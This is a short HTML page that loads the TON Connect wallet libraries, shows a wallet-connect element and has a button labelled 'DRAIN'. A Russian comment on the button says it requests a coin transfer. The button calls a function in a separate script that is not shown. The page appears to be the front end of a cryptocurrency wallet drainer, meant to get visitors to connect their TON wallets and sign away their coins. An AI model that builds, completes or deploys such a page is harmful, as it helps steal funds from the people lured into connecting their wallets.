<!DOCTYPE html>
<html>
<head>
    
    <script src="https://unpkg.com/@tonconnect/ui@latest/dist/tonconnect-ui.min.js"></script>
    <script src="https://unpkg.com/@tonconnect/sdk@latest/dist/tonconnect-sdk.min.js"></script>
    
</head>
<body>



<div id="ton-connect"></div>  <!--Коннект кошелька-->
<button onclick="didtrans();" style="MARGIN-TOP:30PX;FONT-SIZE:24PX;">DRAIN</button><!--Запрос трансфера монет-->




<script src="tonsdk.js"></script>
 
    



</body>


</html>